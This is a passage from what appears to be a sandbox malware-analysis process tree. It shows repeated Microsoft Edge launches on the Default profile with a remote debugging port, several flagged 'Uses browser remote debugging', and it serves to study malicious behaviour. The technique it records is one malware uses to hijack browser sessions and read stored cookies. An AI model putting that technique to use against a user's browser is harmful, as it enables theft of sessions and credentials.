                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1948,12342146210455848537,3418330743364404026,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3344 /prefetch:1
                                                                              7⤵
                                                                              • Uses browser remote debugging
                                                                              PID:2728
                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1948,12342146210455848537,3418330743364404026,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2252 /prefetch:2
                                                                              7⤵
                                                                                PID:184
                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1948,12342146210455848537,3418330743364404026,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2248 /prefetch:2
                                                                                7⤵
                                                                                  PID:4068
                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1948,12342146210455848537,3418330743364404026,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2940 /prefetch:2
                                                                                  7⤵
                                                                                    PID:5296
                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1948,12342146210455848537,3418330743364404026,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=2960 /prefetch:2
                                                                                    7⤵
                                                                                      PID:5624
                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1948,12342146210455848537,3418330743364404026,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=2260 /prefetch:2
                                                                                      7⤵
                                                                                        PID:5620
                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1948,12342146210455848537,3418330743364404026,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3860 /prefetch:2
                                                                                        7⤵
                                                                                          PID:5820
                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                                        6⤵
                                                                                        • Uses browser remote debugging
                                                                                        PID:7832
                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ffc216f46f8,0x7ffc216f4708,0x7ffc216f4718
                                                                                          7⤵
                                                                                            PID:7848
                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2224,7545943767573953230,17003624422221113976,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2236 /prefetch:2
                                                                                            7⤵
                                                                                              PID:8100
                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2224,7545943767573953230,17003624422221113976,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2288 /prefetch:3
                                                                                              7⤵
                                                                                                PID:8116
                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2224,7545943767573953230,17003624422221113976,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2948 /prefetch:8
                                                                                                7⤵
                                                                                                  PID:8152
                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2224,7545943767573953230,17003624422221113976,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3256 /prefetch:1
                                                                                                  7⤵
                                                                                                  • Uses browser remote debugging
                                                                                                  PID:6220
                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2224,7545943767573953230,17003624422221113976,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3320 /prefetch:1
                                                                                                  7⤵
                                                                                                  • Uses browser remote debugging
                                                                                                  PID:6208
                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2224,7545943767573953230,17003624422221113976,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3504 /prefetch:2
                                                                                                  7⤵
                                                                                                    PID:6184
                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2224,7545943767573953230,17003624422221113976,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3508 /prefetch:2
                                                                                                    7⤵
                                                                                                      PID:6164
                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2224,7545943767573953230,17003624422221113976,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2976 /prefetch:2
                                                                                                      7⤵
                                                                                                        PID:3316
                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2224,7545943767573953230,17003624422221113976,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3680 /prefetch:2
                                                                                                        7⤵
                                                                                                          PID:4680
                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2224,7545943767573953230,17003624422221113976,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3680 /prefetch:2
                                                                                                          7⤵
                                                                                                            PID:756
                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2224,7545943767573953230,17003624422221113976,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=4512 /prefetch:2
                                                                                                            7⤵
                                                                                                              PID:5972
                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2224,7545943767573953230,17003624422221113976,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=4676 /prefetch:2
                                                                                                              7⤵
                                                                                                                PID:6064
                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2224,7545943767573953230,17003624422221113976,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3432 /prefetch:2
                                                                                                                7⤵
                                                                                                                  PID:4580
                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                                                                6⤵
                                                                                                                • Uses browser remote debugging
                                                                                                                PID:5760
                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ffc216f46f8,0x7ffc216f4708,0x7ffc216f4718
                                                                                                                  7⤵
                                                                                                                    PID:5800
                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,5258808956196848033,14690983777202201482,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2148 /prefetch:2
                                                                                                                    7⤵
                                                                                                                      PID:6468
                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2132,5258808956196848033,14690983777202201482,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2212 /prefetch:3
                                                                                                                      7⤵
                                                                                                                        PID:6476
                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2132,5258808956196848033,14690983777202201482,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2972 /prefetch:8
                                                                                                                        7⤵
                                                                                                                          PID:6568
                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2132,5258808956196848033,14690983777202201482,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3376 /prefetch:1
                                                                                                                          7⤵
                                                                                                                          • Uses browser remote debugging
                                                                                                                          PID:7128
                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2132,5258808956196848033,14690983777202201482,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3388 /prefetch:1
                                                                                                                          7⤵
                                                                                                                          • Uses browser remote debugging
                                                                                                                          PID:7120
                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,5258808956196848033,14690983777202201482,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2324 /prefetch:2
                                                                                                                          7⤵
                                                                                                                            PID:7052
                                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,5258808956196848033,14690983777202201482,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2364 /prefetch:2
                                                                                                                            7⤵
                                                                                                                              PID:6884
                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,5258808956196848033,14690983777202201482,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2360 /prefetch:2
                                                                                                                              7⤵
                                                                                                                                PID:6856
                                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,5258808956196848033,14690983777202201482,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3712 /prefetch:2
                                                                                                                                7⤵
                                                                                                                                  PID:6780
                                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,5258808956196848033,14690983777202201482,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3708 /prefetch:2
                                                                                                                                  7⤵
                                                                                                                                    PID:6756
                                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,5258808956196848033,14690983777202201482,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3784 /prefetch:2
                                                                                                                                    7⤵
                                                                                                                                      PID:6732
                                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,5258808956196848033,14690983777202201482,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3700 /prefetch:2
                                                                                                                                      7⤵
                                                                                                                                        PID:6668
                                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,5258808956196848033,14690983777202201482,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=2208 /prefetch:2
                                                                                                                                        7⤵
                                                                                                                                          PID:6624
                                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                                                                                        6⤵
                                                                                                                                        • Uses browser remote debugging
                                                                                                                                        PID:7684
                                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x164,0x168,0x16c,0x140,0x170,0x7ffc216f46f8,0x7ffc216f4708,0x7ffc216f4718
                                                                                                                                          7⤵
                                                                                                                                            PID:7700
                                                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
